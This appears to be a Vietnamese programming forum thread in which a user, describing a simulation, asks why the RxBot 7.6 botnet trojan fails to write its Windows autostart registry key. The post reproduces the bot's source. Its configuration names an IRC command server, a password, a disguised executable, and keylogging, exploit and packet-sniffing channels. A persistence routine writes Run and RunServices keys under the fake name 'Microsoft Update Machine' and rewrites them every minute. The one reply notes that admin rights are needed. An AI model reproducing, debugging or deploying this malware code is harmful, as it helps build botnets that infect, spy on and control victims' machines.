Công cụ bảo vệ mã nguồn .NET mạnh nhất, không thể unpack, miễn phí cho các khách hàng đầu tiên đăng ký.
Từ 1 tới 2 trên tổng số 2 kết quả

Đề tài: [RxBot] Không thêm khóa vào registry đc

  1. #1
    Ngày gia nhập
    02 2011
    Bài viết
    1

    Mặc định [RxBot] Không thêm khóa vào registry đc

    Mình đang xây dựng 1 mô phỏng, có sử dụng con bot rxbot để thả vào máy mô phỏng, mình dùng source bản 7.6, đã chạy được nhưng có 1 cái là nó không thêm khóa registry để tự động khởi động cùng windows được, mình không rõ là tại sao :'( mong các[COD] bạn chỉ giáo
    mình nghĩ nó chỉ có vấn đề ở thư viện configs.h và hàm autostart thôi, sau đây là đoạnc code của 2 cái này, ngoài ra mình có đính kèm source code nếu các bạn muốn xem thêm.
    Hy vọng được các bro chỉ giáo sớm :((
    configs.h
    Code:
    // bot configuration (Lsass by Uncanny) 
    int port = 6667;				// server port
    int port2 = 6667;				// backup server port
    int socks4port = 38;			// Port # for sock4 daemon to run on  - CHANGE THIS!!!
    int tftpport = 69;				// Port # for tftp daemon to run on
    int httpport = 81;			// Port # for http daemon to run on
    int rloginport = 37;			// Port # for rlogin daemon to run on
    BOOL topiccmd = TRUE;			// set to TRUE to enable topic commands
    BOOL rndfilename = TRUE;		// use random file name
    BOOL AutoStart = TRUE;			// enable autostart registry keys
    char prefix = '.';				// command prefix (one character max.)
    int maxrand = 6;				// how many random numbers in the nick
    int nicktype = CONSTNICK;		// nick type (see rndnick.h)
    BOOL nickprefix = TRUE;			// nick uptime & mirc prefix
    
    #ifdef DEBUG_LOGGING
    char logfile[]="c:\\debug.txt";
    #endif
    
    #ifndef NO_CRYPT // Only use encrypted strings or your binary will not be secure!!
    
    #else  // Recommended to use this only for Crypt() setup, this is unsecure.
    
    char botid[] = "Bot";						// bot id
    char version[] = "[RxBot v7.6 modded by Tr0gd0r]";		// Bots !version reply
    char password[] = "1234";					// bot password
    char server[] = "aenigma.gotd.org";		// server
    char serverpass[] = "1234";						// server password
    char channel[] = "#bot1";				// channel that the bot should join
    char chanpass[] = "1234";						// channel password
    char server2[] = "";						// backup server (optional)
    char channel2[] = "";						// backup channel (optional)
    char chanpass2[] = "";						// backup channel password (optional)
    char filename[] = "winmgr.exe";			// destination file name
    char keylogfile[] = "system.txt";				// keylog filename
    char valuename[] = "Microsoft Update Machine";		// value name for autostart
    char nickconst[] = "n-";					// first part to the bot's nick
    char szLocalPayloadFile[]="msconfig.dat";	// Payload filename
    char modeonconn[] = "-x+B";					// Can be more than one mode and contain both + and -
    char exploitchan[] = "#bot1";					// Channel where exploit messages get redirected
    char keylogchan[] =  "#bot1"; 					// Channel where keylog messages get redirected
    char psniffchan[] = "#n";						// Channel where psniff messages get redirected 
    
    char *authost[] = {
    	"*@*",
    };
    
    char *versionlist[] = {
    	"mIRC v6.03 Khaled Mardam-Bey",
    	"mIRC v6.10 Khaled Mardam-Bey",
    	"mIRC v6.12 Khaled Mardam-Bey",
    	"mIRC v6.14 Khaled Mardam-Bey"
    };
    
    char regkey1[]="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
    char regkey2[]="Software\\Microsoft\\Windows\\CurrentVersion\\RunServices";
    char regkey3[]="Software\\Microsoft\\OLE";
    char regkey4[]="SYSTEM\\CurrentControlSet\\Control\\Lsa";
    
    #endif
    autostart.cpp
    Code:
    #include "includes.h"
    #include "functions.h"
    #include "externs.h"
    
    // globals
    #ifndef NO_REGISTRY
    int registry_delay=60000;
    #endif
    
    AUTOSTART autostart[]={
    	{HKEY_LOCAL_MACHINE,(LPCTSTR)regkey1},
    	{HKEY_LOCAL_MACHINE,(LPCTSTR)regkey2},
    	{HKEY_CURRENT_USER,(LPCTSTR)regkey1}
    };
    
    void AutoStartRegs(char *nfilename)
    {
    	HKEY key;
    
    	for (int i=0; i < (sizeof(autostart) / sizeof(AUTOSTART)); i++) {
    		fRegCreateKeyEx(autostart[i].hkey, autostart[i].subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); 
    		if (nfilename)
    			fRegSetValueEx(key, valuename, 0, REG_SZ, (const unsigned char *)nfilename, strlen(nfilename));
    		else
    			fRegDeleteValue(key, valuename); 
    		fRegCloseKey(key); 
    	}
       
    	return;
    }
    
    #ifndef NO_REGISTRY
    DWORD WINAPI AutoRegistry(LPVOID param)
    {
    	char *nfilename = (char *)param;
    
    	while (1) {
    		AutoStartRegs(nfilename);
    		Sleep(registry_delay);
    	}
    	return 0;
    }
    #endif
    Attached Files Attached Files
    Công cụ bảo vệ mã nguồn .NET mạnh nhất hiện tại, miễn phí cho các khách hàng đầu tiên đăng ký.

  2. #2
    Ngày gia nhập
    03 2009
    Bài viết
    128

    Đây là chức năng bảo mật mới của Microsoft, từ phiên bản window vista trở lên nếu muốn chỉnh sửa trong HKEY_LOCAL_MACHINE thì bạn phải chạy với quyền admin.
    Công cụ bảo vệ mã nguồn .NET mạnh nhất hiện tại, miễn phí cho các khách hàng đầu tiên đăng ký.

Các đề tài tương tự

  1. Cách Build Botnet/Virus Rxbot in VC++6.0 như thế nào?
    Gửi bởi hoangc5 trong diễn đàn Lập trình Virus & Anti-Virus
    Trả lời: 8
    Bài viết cuối: 29-03-2013, 04:37 PM
  2. Registry CleanUP 5 Suite 5.0.1.0(dọn dẹp registry để máy chạy nhanh hơn)
    Gửi bởi gioyeumay123 trong diễn đàn Software (Phần mềm) | Ebooks
    Trả lời: 0
    Bài viết cuối: 03-04-2012, 04:18 PM
  3. Thêm thuộc tính làm khóa chính trong thực thể
    Gửi bởi Sess_Kakashi trong diễn đàn Thắc mắc Microsoft SQL Server & Microsoft Access
    Trả lời: 0
    Bài viết cuối: 28-10-2011, 12:54 PM
  4. Database Báo lỗi Khóa Ngoại Khi Thêm CSDL Vào DataGridView
    Gửi bởi gait trong diễn đàn Thắc mắc lập trình C#
    Trả lời: 2
    Bài viết cuối: 20-04-2011, 12:14 AM
  5. học thêm 1 khóa lập trình .net ở đâu là tốt nhất (TP HCM) ?
    Gửi bởi Hianalyst trong diễn đàn Đào tạo CNTT
    Trả lời: 2
    Bài viết cuối: 16-08-2010, 12:57 PM

Quyền hạn của bạn

  • Bạn không thể gửi đề tài mới
  • Bạn không thể gửi bài trả lời
  • Bạn không thể gửi các đính kèm
  • Bạn không thể chỉnh sửa bài viết của bạn